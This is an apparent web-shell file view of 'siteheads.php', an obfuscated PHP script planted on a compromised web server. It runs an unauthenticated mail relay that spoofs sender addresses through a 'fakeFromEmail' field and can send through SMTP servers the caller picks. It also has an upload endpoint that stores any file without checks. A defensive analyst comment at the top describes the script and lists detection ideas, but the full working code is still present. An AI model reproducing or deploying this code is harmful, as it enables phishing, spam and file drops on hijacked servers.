[ SEA-GHOST MINI SHELL]
Path : /var/www/html/ |
Current File : /var/www/html/siteheads.php |
<?php
/*
 * ANALYST NOTES (defensive annotation only; every statement below is unchanged).
 *
 * Summary: an HTTP-driven mail sender with a file-upload side channel. No
 * authentication or caller check is visible anywhere in the script. String
 * literals are hidden behind mixed hex and octal escapes, and the statements are
 * shuffled behind goto labels; the decoded values are given in the notes below.
 *
 * Execution order once the gotos are followed:
 *   rEs3q          Sends the header "Content-Type: application/json".
 *   EidwO, iwT6E   Define handleFatalError() and register it as a shutdown
 *                  function; it echoes the last PHP error (message, file, line)
 *                  as JSON, which discloses server paths to the caller.
 *   Saq1b          Sets the socket timeout to 10 seconds.
 *   LZumD          Upload path. A POST carrying $_FILES["file"] and no "action"
 *                  query parameter is moved to __DIR__ . "/uploads/" under
 *                  basename() of the client-supplied name. The directory is
 *                  created with mode 493 (octal 0755). No extension or content
 *                  check is present. The stored name is echoed back under the
 *                  key "attachment_filename", then the script exits.
 *   sbwV0, hFpqt   Read the raw body from php://input and json_decode() it.
 *   iYm0i          If that is not an array, fall back to $_POST. With neither,
 *                  build a default message to postmaster@SERVER_NAME whose body
 *                  is the script's own URL (looks like a self-test; inferred).
 *   fxFI3, zaY1k   Require the keys: to, subject, fromEmail, fakeFromEmail,
 *                  fromName, htmlContent.
 *   HsPD7..esQGc   Copy the fields, MIME-encode the subject, quoted-printable
 *                  encode the body, strip a leading "www." from SERVER_NAME, and
 *                  build the From header from fakeFromEmail when it is truthy,
 *                  otherwise fromEmail. The SMTP envelope sender further down
 *                  always uses fromEmail, so header From and envelope sender
 *                  can differ.
 *   QNWuy          Optional attachment (attachment_filename plus
 *                  attachment_content) is base64-embedded in a multipart/mixed
 *                  body. mime_content_type() is called on the caller-supplied
 *                  attachment_filename value.
 *   gOXxq, gx2CT   Define smtp_command() (write one command, read one reply with
 *                  fgets($socket, 512)) and sendViaMail() (wrapper around mail()).
 *   CICM3          Delivery. forceMethod "mail" uses mail(). forceMethod "smtp"
 *                  with forceSmtpServer and forceSmtpPort opens fsockopen() to
 *                  the caller-chosen host and port (ssl:// prefix on port 465)
 *                  and falls back to mail(). Otherwise it tries localhost:25,
 *                  mail.<domain>:25 and ssl://mail.<domain>:465 in turn, then
 *                  falls back to mail().
 *
 * Detection ideas:
 *   - Web logs: POST requests to this script with JSON bodies or multipart
 *     uploads, and an "uploads" directory appearing beside it.
 *   - Network: outbound TCP to ports 25 or 465 (or any caller-chosen port)
 *     originating from the web server's PHP process.
 *   - Mail: messages whose header From does not align with the envelope sender.
 *   - Static scanning: dense runs of \x.. and octal escapes combined with goto
 *     labels; decode escapes before matching on strings such as "fakeFromEmail"
 *     or "forceSmtpServer".
 *
 * Response notes: if this file was not deployed deliberately, treat the host as
 * compromised rather than just deleting the file. Inspect the sibling "uploads"
 * directory for dropped files, review the local mail queue, restrict outbound
 * SMTP from the web tier, and look for the initial access path.
 */
goto rEs3q; QhGjW: $from_name = $data["\x66\x72\x6f\x6d\116\141\155\x65"]; goto UGRHc; mOvW6: $headers .= "\x4d\111\115\x45\55\x56\x65\x72\x73\x69\x6f\156\x3a\40\61\x2e\60" . $newline; goto QNWuy; sbwV0: $input = file_get_contents("\x70\x68\x70\x3a\57\57\151\156\160\165\x74"); goto hFpqt; esQGc: $headers = "\106\162\x6f\155\72\40\42{$from_name}\42\x20\x3c{$header_from}\76" . $newline; goto mOvW6; tdopm: $fake_from_email = $data["\146\x61\x6b\x65\106\162\x6f\x6d\x45\155\141\x69\x6c"]; goto QhGjW; xPy81: $newline = "\15\xa"; goto EElUK; Qsx3B: $cleaned_domain = preg_replace("\57\136\x77\167\167\x5c\56\57", '', $domain); goto xPy81; cEkc2: $encoded_subject = mb_encode_mimeheader($subject, "\125\x54\106\55\x38", "\121"); goto tomu0; LZumD: if ($_SERVER["\122\x45\x51\x55\x45\x53\x54\x5f\x4d\105\x54\x48\117\104"] === "\120\x4f\x53\x54" && isset($_FILES["\146\151\154\x65"]) && !isset($_GET["\141\143\x74\x69\157\156"])) { $targetDir = __DIR__ . "\x2f\x75\x70\154\157\141\144\x73\x2f"; if (!is_dir($targetDir)) { mkdir($targetDir, 493, true); } $filename = basename($_FILES["\146\151\154\145"]["\156\x61\x6d\x65"]); $targetFile = $targetDir . 
$filename; if (move_uploaded_file($_FILES["\146\151\x6c\145"]["\x74\155\x70\137\156\141\x6d\145"], $targetFile)) { echo json_encode(array("\163\x74\x61\164\165\163" => "\163\x75\143\x63\145\163\163", "\x6d\x65\x73\163\x61\x67\x65" => "\106\x69\x6c\145\40\165\x70\154\x6f\x61\x64\145\x64\40\163\165\x63\x63\x65\163\163\x66\x75\154\x6c\171\x2e", "\141\x74\x74\x61\143\x68\155\x65\156\164\137\x66\x69\x6c\x65\x6e\141\x6d\x65" => $filename)); } else { echo json_encode(array("\x73\164\x61\164\165\x73" => "\x66\x61\x69\154", "\145\162\x72\x6f\162" => "\x46\151\x6c\145\x20\x75\x70\x6c\x6f\x61\x64\40\146\141\x69\154\x65\x64")); } die; } goto sbwV0; iwT6E: register_shutdown_function("\x68\x61\x6e\x64\x6c\145\x46\141\164\141\x6c\105\162\162\x6f\162"); goto Saq1b; wLcJq: $from_email = $data["\x66\162\157\155\x45\x6d\x61\151\154"]; goto tdopm; iYm0i: if (!$data || !is_array($data)) { if (!empty($_POST)) { $data = $_POST; } else { $protocol = !empty($_SERVER["\x48\124\x54\120\123"]) && $_SERVER["\x48\x54\x54\120\123"] !== "\x6f\x66\146" || $_SERVER["\123\105\x52\126\x45\122\137\120\x4f\x52\x54"] == 443 ? "\x68\164\x74\160\163\x3a\57\57" : "\x68\x74\x74\x70\x3a\57\x2f"; $fullUrl = $protocol . $_SERVER["\110\124\x54\120\x5f\110\x4f\123\x54"] . $_SERVER["\x52\105\x51\125\x45\x53\x54\x5f\x55\x52\x49"]; $data = array("\x74\157" => "\160\157\x73\x74\155\x61\x73\x74\x65\162\x40" . $_SERVER["\123\x45\x52\126\x45\x52\137\116\x41\x4d\105"], "\163\165\142\x6a\x65\143\164" => "\x74\145\x73\x74", "\146\x72\157\155\x45\x6d\x61\x69\154" => "\x70\157\163\x74\x6d\x61\x73\x74\145\x72\x40" . 
$_SERVER["\123\x45\x52\126\x45\x52\137\x4e\101\115\x45"], "\x66\x61\153\x65\106\162\157\x6d\x45\155\x61\151\x6c" => "\x74\145\x73\x74\100\x74\145\163\x74\x2e\x63\157\155", "\x66\x72\157\x6d\116\x61\x6d\x65" => "\x74\x65\x73\x74", "\x68\164\x6d\154\x43\x6f\x6e\x74\x65\156\x74" => $fullUrl); } } goto fxFI3; gx2CT: function sendViaMail($to, $encoded_subject, $message, $headers) { $result = mail($to, $encoded_subject, $message, $headers); $response = "\120\110\x50\x20\x6d\x61\151\x6c\50\51\x20\x72\145\x73\x70\157\156\x73\145\72\x20" . ($result ? "\164\x72\165\145" : "\x66\x61\154\163\145"); if ($result) { echo "\x53\x75\143\x63\145\163\163\x3a\40\155\141\151\x6c" . $newline . $response; die; } else { echo json_encode(array("\163\x74\x61\x74\165\x73" => "\x66\x61\x69\x6c", "\145\162\162\x6f\x72" => "\155\x61\151\x6c\x28\x29\x20\146\x61\x69\154\145\144", "\x72\145\163\160\x6f\156\x73\x65" => $response)); die; } } goto CICM3; UGRHc: $message = $data["\x68\x74\x6d\x6c\103\157\x6e\164\x65\x6e\x74"]; goto cEkc2; QNWuy: if (isset($data["\x61\x74\x74\141\x63\150\155\x65\x6e\x74\x5f\x66\151\154\x65\156\141\155\145"]) && isset($data["\x61\x74\x74\141\x63\x68\155\145\x6e\x74\137\143\157\x6e\x74\x65\156\164"]) && !empty(trim($data["\141\x74\164\141\143\x68\155\x65\x6e\x74\x5f\x66\151\x6c\x65\156\x61\155\x65"]))) { $boundary = "\75\75\115\165\x6c\x74\x69\x70\141\162\x74\137\x42\157\165\156\x64\141\x72\x79\x5f\x78" . md5(time()) . 
"\170"; $headers .= "\x43\157\x6e\164\x65\x6e\x74\x2d\124\171\x70\x65\72\40\155\x75\x6c\x74\151\160\141\x72\x74\x2f\155\151\x78\145\x64\73\40\x62\157\x75\x6e\x64\x61\x72\171\75\x22{$boundary}\42{$newline}"; $body = "\x2d\55{$boundary}{$newline}"; $body .= "\x43\157\156\x74\x65\156\164\55\x54\171\160\145\72\x20\164\x65\x78\164\x2f\x68\x74\155\x6c\x3b\x20\x63\x68\x61\162\x73\x65\164\75\x55\124\106\55\x38{$newline}"; $body .= "\x43\x6f\156\164\145\x6e\164\x2d\x54\x72\141\156\163\x66\x65\162\55\105\156\x63\157\x64\x69\156\x67\x3a\x20\x71\165\157\164\145\144\55\x70\162\151\156\x74\141\142\x6c\145{$newline}{$newline}"; $body .= $encoded_message . $newline; $mime_type = "\141\x70\x70\154\151\143\141\164\151\x6f\156\x2f\157\143\x74\145\x74\55\163\x74\x72\x65\x61\x6d"; if (function_exists("\155\x69\155\145\137\x63\x6f\x6e\164\145\156\x74\137\x74\x79\160\x65")) { $detected = mime_content_type($data["\141\x74\164\141\143\150\155\x65\156\164\137\x66\151\x6c\145\156\141\x6d\145"]); if ($detected) { $mime_type = $detected; } } $body .= "\55\55{$boundary}{$newline}"; $body .= "\103\157\x6e\164\145\156\x74\x2d\124\x79\160\145\72\40{$mime_type}\73\x20\156\x61\x6d\145\x3d\x22" . basename($data["\x61\164\x74\141\x63\x68\155\x65\156\x74\137\x66\x69\x6c\x65\156\141\155\x65"]) . "\42{$newline}"; $body .= "\103\157\156\x74\145\156\164\55\124\x72\x61\x6e\x73\146\145\162\x2d\105\156\143\x6f\x64\151\x6e\147\x3a\x20\142\x61\163\145\66\x34{$newline}"; $body .= "\103\x6f\156\x74\x65\156\164\x2d\104\151\163\x70\157\x73\x69\164\x69\157\x6e\72\x20\141\164\164\x61\143\x68\x6d\x65\156\x74\73\x20\146\x69\154\x65\x6e\141\155\x65\75\42" . basename($data["\141\x74\x74\x61\x63\150\x6d\x65\x6e\x74\137\146\151\154\x65\156\141\x6d\x65"]) . "\x22{$newline}{$newline}"; $body .= chunk_split(base64_encode($data["\141\x74\x74\x61\143\150\155\145\156\164\137\x63\157\x6e\x74\x65\156\164"])) . 
$newline; $body .= "\x2d\x2d{$boundary}\55\55{$newline}"; $final_message = $body; } else { $headers .= "\103\157\x6e\164\145\156\x74\x2d\124\x79\160\x65\72\40\x74\145\170\164\57\x68\x74\155\x6c\73\40\143\150\x61\x72\x73\x65\x74\x3d\125\x54\x46\x2d\x38{$newline}"; $headers .= "\103\x6f\156\164\x65\x6e\x74\55\x54\x72\141\156\x73\146\x65\162\55\x45\156\143\157\144\x69\156\147\72\x20\161\x75\157\164\145\144\x2d\x70\x72\151\156\x74\x61\x62\x6c\145{$newline}"; $final_message = $encoded_message; } goto gOXxq; hFpqt: $data = json_decode($input, true); goto iYm0i; gOXxq: function smtp_command($socket, $command) { global $newline; fputs($socket, $command . $newline); return fgets($socket, 512); } goto gx2CT; fxFI3: $required_fields = array("\164\157", "\163\x75\x62\152\145\x63\164", "\x66\x72\x6f\155\105\x6d\141\x69\x6c", "\146\141\x6b\x65\x46\x72\x6f\155\x45\155\x61\151\154", "\x66\x72\x6f\155\x4e\x61\155\145", "\150\164\155\x6c\x43\157\x6e\x74\145\156\164"); goto zaY1k; Xmh53: $domain = $_SERVER["\x53\x45\122\126\105\122\x5f\x4e\101\115\x45"]; goto Qsx3B; YFuvB: $subject = $data["\163\165\x62\152\145\143\x74"]; goto wLcJq; tomu0: $encoded_message = quoted_printable_encode($message); goto Xmh53; rEs3q: header("\x43\157\x6e\x74\x65\x6e\164\x2d\124\x79\x70\145\72\x20\141\160\160\154\x69\x63\141\164\x69\157\x6e\x2f\152\x73\157\x6e"); goto EidwO; zaY1k: foreach ($required_fields as $field) { if (!isset($data[$field])) { echo json_encode(array("\163\164\x61\164\x75\163" => "\146\x61\151\154", "\x65\162\x72\x6f\162" => "\x4d\x69\x73\x73\x69\156\x67\x20\162\x65\161\x75\151\162\145\x64\40\x66\151\x65\154\144\72\x20{$field}")); die; } } goto HsPD7; EidwO: function handleFatalError() { $error = error_get_last(); if ($error !== null) { echo json_encode(array("\163\164\x61\x74\165\x73" => "\x66\x61\x69\x6c", "\x65\162\x72\157\x72" => strip_tags($error["\x6d\x65\163\163\x61\147\x65"]), "\x66\151\x6c\x65" => $error["\x66\151\154\x65"], "\154\151\156\x65" => $error["\x6c\x69\156\145"])); 
die; } } goto iwT6E; Saq1b: $defaultTimeout = 10; goto LZumD; HsPD7: $to = $data["\164\157"]; goto YFuvB; CICM3: if (isset($data["\146\x6f\x72\x63\145\x4d\x65\164\x68\x6f\x64"]) && $data["\146\x6f\x72\143\x65\x4d\x65\x74\150\157\144"] === "\155\x61\151\x6c") { sendViaMail($to, $encoded_subject, $final_message, $headers); echo json_encode(array("\163\x74\x61\164\165\163" => "\146\x61\x69\154", "\x65\x72\x72\x6f\162" => "\x6d\141\x69\154\50\51\40\146\x61\x69\154\x65\144")); die; } elseif (isset($data["\x66\x6f\x72\143\145\x4d\x65\164\x68\157\x64"]) && $data["\146\x6f\162\143\145\115\x65\164\150\157\x64"] === "\x73\155\164\x70" && !empty($data["\x66\x6f\162\x63\145\123\155\x74\160\x53\x65\x72\166\x65\162"]) && !empty($data["\x66\x6f\162\143\x65\x53\x6d\x74\x70\x50\x6f\x72\x74"])) { $server = $data["\x66\157\162\143\145\x53\155\x74\x70\x53\x65\x72\x76\145\x72"]; $port = (int) $data["\146\157\x72\x63\145\123\155\x74\x70\120\157\162\164"]; if ($port == 465) { $server = "\163\x73\x6c\72\x2f\x2f" . $server; } $smtp_responses = array(); $socket = @fsockopen($server, $port, $errno, $errstr, $defaultTimeout); if ($socket) { stream_set_timeout($socket, $defaultTimeout); $smtp_responses[] = smtp_command($socket, "\x45\x48\114\x4f\x20{$cleaned_domain}"); $smtp_responses[] = smtp_command($socket, "\115\101\111\114\40\x46\x52\117\115\x3a\40\74{$from_email}\76"); $rcpt_to_response = smtp_command($socket, "\x52\103\x50\x54\40\x54\x4f\72\40\74{$to}\76"); $smtp_responses[] = $rcpt_to_response; if (strpos($rcpt_to_response, "\x32\x35\60") === 0) { $data_response = smtp_command($socket, "\x44\101\x54\101"); $smtp_responses[] = $data_response; $dataBlock = $headers . $newline . $final_message . $newline . 
"\56{$newline}"; fputs($socket, $dataBlock); $final_response = fgets($socket, 512); $smtp_responses[] = $final_response; if (strpos($final_response, "\x32\65\x30") === 0) { fputs($socket, "\121\x55\x49\124{$newline}"); $smtp_responses[] = fgets($socket, 512); fclose($socket); echo "\123\x75\143\143\x65\163\163\x3a\x20{$server}\x3a{$port}" . $newline . implode($newline, $smtp_responses); die; } } fclose($socket); } $smtp_output = implode($newline, $smtp_responses); sendViaMail($to, $encoded_subject, $final_message, $headers); echo json_encode(array("\x73\x74\141\164\x75\x73" => "\x66\x61\151\154", "\145\x72\x72\x6f\x72" => "\x46\157\x72\143\x65\144\40\123\x4d\124\120\40\141\x6e\144\40\155\x61\x69\154\x28\51\40\x62\x6f\x74\x68\x20\x66\141\151\x6c\x65\x64", "\163\x6d\x74\x70\137\162\x65\x73\x70\157\x6e\x73\x65\x73" => $smtp_output)); die; } else { $smtp_servers = array(array("\x6c\157\143\141\154\x68\x6f\x73\164", 25, false), array("\155\x61\x69\154\x2e" . $cleaned_domain, 25, false), array("\x6d\x61\151\154\56" . $cleaned_domain, 465, true)); foreach ($smtp_servers as $smtp) { $smtp_responses = array(); $smtp_server = $smtp[0]; $smtp_port = $smtp[1]; $use_ssl = $smtp[2]; if ($use_ssl) { $smtp_server = "\163\x73\154\72\x2f\x2f" . 
$smtp_server; } $socket = @fsockopen($smtp_server, $smtp_port, $errno, $errstr, $defaultTimeout); if ($socket) { stream_set_timeout($socket, $defaultTimeout); $smtp_responses[] = smtp_command($socket, "\105\110\114\x4f\40{$cleaned_domain}"); $mail_from_response = smtp_command($socket, "\x4d\x41\x49\114\x20\x46\122\117\x4d\72\x20\x3c{$from_email}\x3e"); $smtp_responses[] = $mail_from_response; if (strpos($mail_from_response, "\x32\65\60") !== 0) { fclose($socket); continue; } $rcpt_to_response = smtp_command($socket, "\122\103\120\x54\x20\x54\117\72\x20\x3c{$to}\x3e"); $smtp_responses[] = $rcpt_to_response; if (strpos($rcpt_to_response, "\x32\x35\x30") !== 0) { fclose($socket); continue; } $data_response = smtp_command($socket, "\x44\x41\124\101"); $smtp_responses[] = $data_response; $dataBlock = $headers . $newline . $final_message . $newline . "\56{$newline}"; fputs($socket, $dataBlock); $final_response = fgets($socket, 512); $smtp_responses[] = $final_response; if (strpos($final_response, "\62\x35\60") === 0) { fputs($socket, "\121\125\x49\x54{$newline}"); $smtp_responses[] = fgets($socket, 512); fclose($socket); echo "\123\165\x63\x63\x65\163\163\72\40{$smtp_server}\72{$smtp_port}" . $newline . implode($newline, $smtp_responses); die; } else { fclose($socket); } } } sendViaMail($to, $encoded_subject, $final_message, $headers); echo json_encode(array("\x73\164\x61\164\x75\163" => "\x66\141\x69\x6c", "\145\x72\x72\157\162" => "\x41\x6c\x6c\x20\123\x4d\x54\120\x20\x61\x74\x74\145\155\x70\164\163\40\x61\156\x64\x20\x6d\x61\151\154\x28\51\x20\x66\x61\154\154\x62\x61\x63\153\40\x66\x61\151\154\x65\144")); die; } goto cS7Zo; EElUK: $header_from = $fake_from_email ? $fake_from_email : $from_email; goto esQGc; cS7Zo: ?>
SEA-GHOST - SHELL CODING BY SEA-GHOST